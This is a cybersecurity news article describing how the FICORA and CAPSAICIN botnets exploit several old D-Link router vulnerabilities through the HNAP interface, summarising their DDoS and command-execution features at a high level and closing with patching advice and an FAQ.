CSC News Table of Contents
The D-Link router exploits fueling FICORA and Kaiten botnet attacks have raised serious cybersecurity concerns globally.
These attacks leverage outdated vulnerabilities in D-Link routers to rope devices into powerful botnets, wreaking havoc through distributed denial-of-service (DDoS) attacks and malicious payload deployments.
Despite some of these vulnerabilities being over a decade old, attackers continue to exploit them, targeting users and businesses that fail to update their devices. If you’re still using an older D-Link router, it’s time to take immediate action.
Key Takeaway: D-Link Router Exploits Fuel FICORA and Kaiten Botnet Attacks
- Unpatched D-Link routers are being targeted by FICORA and Kaiten botnets, causing global cybersecurity threats.
Understanding the D-Link Router Exploits
The latest warning from cybersecurity researchers highlights a disturbing trend of attackers exploiting long-known vulnerabilities in D-Link routers.
These exploits are powering two distinct botnets: a Mirai variant named FICORA and a Kaiten variant dubbed CAPSAICIN.
The Vulnerabilities in Focus
The weaknesses being exploited include:
| CVE Number | Year Disclosed | Description |
|---|---|---|
| CVE-2015-2051 | 2015 | HNAP interface command execution flaw |
| CVE-2019-10891 | 2019 | Remote code execution vulnerability |
| CVE-2022-37056 | 2022 | Arbitrary command execution |
| CVE-2024-33112 | 2024 | Critical flaw in device configuration |
These vulnerabilities allow attackers to take control of devices via the Home Network Administration Protocol (HNAP) interface by sending malicious commands through the GetDeviceSettings action.
How FICORA and Kaiten Botnets Operate
FICORA Botnet
The FICORA botnet attacks systems by downloading a shell script (multi) from a remote server. This script then deploys payloads tailored for various Linux architectures. FICORA’s key features include:
- Brute-Force Attacks: Uses hard-coded username and password combinations.
- DDoS Attacks: Employs UDP, TCP, and DNS protocols to flood targets.
CAPSAICIN Botnet
CAPSAICIN operates similarly, downloading its payload via the bins.sh script. Once installed, it communicates with a command-and-control (C2) server to execute operations such as:
- Flooding Attacks: Executes DDoS using methods like TCP and UDP flooding.
- Shell Command Execution: Runs shell commands remotely.
- System Manipulation: Can kill competing botnet processes to dominate infected devices.
Real-Life Impact: A Global Threat
According to Fortinet FortiGuard Labs, FICORA botnet attacks are widespread, while CAPSAICIN has mainly targeted East Asia, with intense activity in Japan and Taiwan during October 2024.
This attack pattern is reminiscent of the 2016 Mirai botnet attack, which crippled major websites and services globally by leveraging IoT devices with weak security.
What This Means for the Future
The resurgence of these old vulnerabilities signals a need for better cybersecurity awareness and routine device updates. As botnets evolve, attackers will continue exploiting IoT devices with poor defenses, amplifying risks for unpatched systems.
Organizations and individuals must:
- Regularly patch their devices.
- Conduct network security audits.
- Replace unsupported hardware.
About D-Link
D-Link Corporation is a leading provider of networking equipment, including routers, switches, and security cameras. The company offers solutions for both businesses and consumers.
For more information, visit D-Link’s official website.
Rounding Up
The D-Link router exploits fueling FICORA and Kaiten botnet attacks demonstrate how outdated devices can create massive vulnerabilities.
Regular updates and proactive cybersecurity practices are critical to mitigating these risks. Don’t wait until it’s too late, protect your network today.
FAQs
What are FICORA and Kaiten botnets?
- FICORA and Kaiten are botnets that use exploited D-Link routers to conduct DDoS attacks and execute malicious commands.
Which vulnerabilities are being exploited?
- The vulnerabilities include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
How can I protect my router from these attacks?
- Update your router’s firmware, disable HNAP if possible, and replace outdated devices.
What is the impact of these botnets?
- They cause service disruptions through DDoS attacks and compromise device security globally.
Are there any signs my router is infected?
- Unusual network activity, slow performance, or unknown connections could indicate infection.
